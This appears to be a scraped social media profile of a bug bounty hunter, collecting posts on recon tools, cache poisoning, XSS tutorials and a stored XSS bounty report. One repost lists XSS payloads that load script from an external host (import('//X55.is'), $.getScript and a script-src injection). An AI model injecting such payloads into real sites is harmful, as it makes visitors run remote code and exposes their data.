dirtycoder0124's profile picture. A positive, never give up person. Founder of https://blindf.com
Telegram group
https://t.me/+xa7Q6GcEudFkYzA1

Vipin Panchal

@dirtycoder0124

A positive, never give up person. Founder of https://blindf.com Telegram group https://t.me/+xa7Q6GcEudFkYzA1

Paste the data, and it will extract the domains. Not perfect, but useful for me. #bugbountytips #BugBounty dirtycoder0124.github.io/domain-extract…

dirtycoder0124's tweet image. Paste the data, and it will extract the domains. Not perfect, but useful for me.
#bugbountytips #BugBounty
dirtycoder0124.github.io/domain-extract…

Just got a reward for a high vulnerability submitted on @yeswehack -- (XSS) - Stored (CWE-79). yeswehack.com/hunters/dirty0… #YesWeRHackers Steps: 1. Found misconfigured Algolia key 2. Escalate it into Stored XSS 3. Payload executed when searching for a specific keyword #bugbountytips


Vipin Panchal reposted

Bug Bounty Search Engine Google advanced search queries generator for target domain: File & Directory Discovery Vulnerabilities & Exploits Subdomain & Asset Discovery And lot more github.com/gatiella/Bug-B… #InfoSec #BugBounty #bugbountytips #CyberSecurity

viehgroup's tweet image. Bug Bounty Search Engine

Google advanced search queries generator for target domain:

File & Directory Discovery
Vulnerabilities & Exploits
Subdomain & Asset Discovery
And lot more

github.com/gatiella/Bug-B…

#InfoSec #BugBounty #bugbountytips #CyberSecurity

Vipin Panchal reposted

Stop missing cache poisoning vulnerabilities. Most hunters only test X-Forwarded-Host and miss 90% of the attack surface. I wrote a complete guide to finding what others miss: medium.com/@Aacle/the-cac… #bugbounty #infosec

aacle_'s tweet image. Stop missing cache poisoning vulnerabilities.

Most hunters only test X-Forwarded-Host and miss 90% of the attack surface.

I wrote a complete guide to finding what others miss:

medium.com/@Aacle/the-cac…

#bugbounty #infosec

Vipin Panchal reposted

LLM-powered subdomain enumeration tool.⚔️ - github.com/samogod/samosc… #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. LLM-powered subdomain enumeration tool.⚔️

- github.com/samogod/samosc…

#infosec #cybersec #bugbountytips

Vipin Panchal reposted

Everyone hunts for common bugs… but the real rewards often hide in the underrated ones. I’ve made a YouTube playlist — “Underrated Vulnerabilities” showing how to find impactful bugs most hackers miss. Practical. Real. Eye-opening. Watch here: youtube.com/watch?v=GZ5yaQ…

thehacktivator's tweet image. Everyone hunts for common bugs… but the real rewards often hide in the underrated ones.

I’ve made a YouTube playlist — “Underrated Vulnerabilities” showing how to find impactful bugs most hackers miss.
Practical. Real. Eye-opening.
Watch here:  youtube.com/watch?v=GZ5yaQ…

Vipin Panchal reposted

Want to learn XSS from scratch and turn it into real, practical skills? I made a 23-video YouTube playlist that takes you from basic payloads to advanced XSS chains — with live target demos. Completely FREE. Watch the playlist youtube.com/watch?v=1WFEVp…

thehacktivator's tweet image. Want to learn XSS from scratch and turn it into real, practical skills?

I made a 23-video YouTube playlist that takes you from basic payloads to advanced XSS chains — with live target demos.

Completely FREE. Watch the playlist

youtube.com/watch?v=1WFEVp…

Vipin Panchal reposted

Best Alternatives to alert(1) #XSS Payload 1. import('//X55.is') x55.is/brutelogic/xss… 2. $.getScript('//X55.is') * x55.is/brutelogic/xss… 3. appendChild(createElement`script`).src='//X55.is' x55.is/brutelogic/xss… * requires jQuery loaded on DOM #hack2learn


Vipin Panchal reposted

Use NextJS? Recon ✨ A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); Cred = linkedin.com/in/0xsojalsec?… #infosec #cybersec #bugbountytips

ofjaaah's tweet image. Use NextJS? Recon ✨

A quick way to find "all" paths for Next.js websites:
DevTools->Console

console.log(__BUILD_MANIFEST.sortedPages)

javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));

Cred = linkedin.com/in/0xsojalsec?…

#infosec #cybersec #bugbountytips

Vipin Panchal reposted

Live bug bounty videos!!!!! mega.nz/folder/dglxGay…

TheMsterDoctor1's tweet image. Live bug bounty videos!!!!!

mega.nz/folder/dglxGay…

Vipin Panchal reposted

🔍 Unlock the secrets of the web with "The Art of Web Reconnaissance: Bug Bounty & Ethical Hacking"! 🌐💻 📌 What you'll learn: - Advanced web reconnaissance techniques - Identifying and exploiting vulnerabilities - Best practices for ethical hacking - Real-world bug bounty…

TheMsterDoctor1's tweet image. 🔍 Unlock the secrets of the web with "The Art of Web Reconnaissance: Bug Bounty & Ethical Hacking"! 🌐💻

📌 What you'll learn:
- Advanced web reconnaissance techniques
- Identifying and exploiting vulnerabilities
- Best practices for ethical hacking
- Real-world bug bounty…

Now you can search keywords/secrets in both HTML+JS files. Also, it shows all URLs with parameters on the page. Already found some open redirects using this extension. #bugbountytips #bugbounty github.com/dirtycoder0124…


Loading...

Something went wrong.


Something went wrong.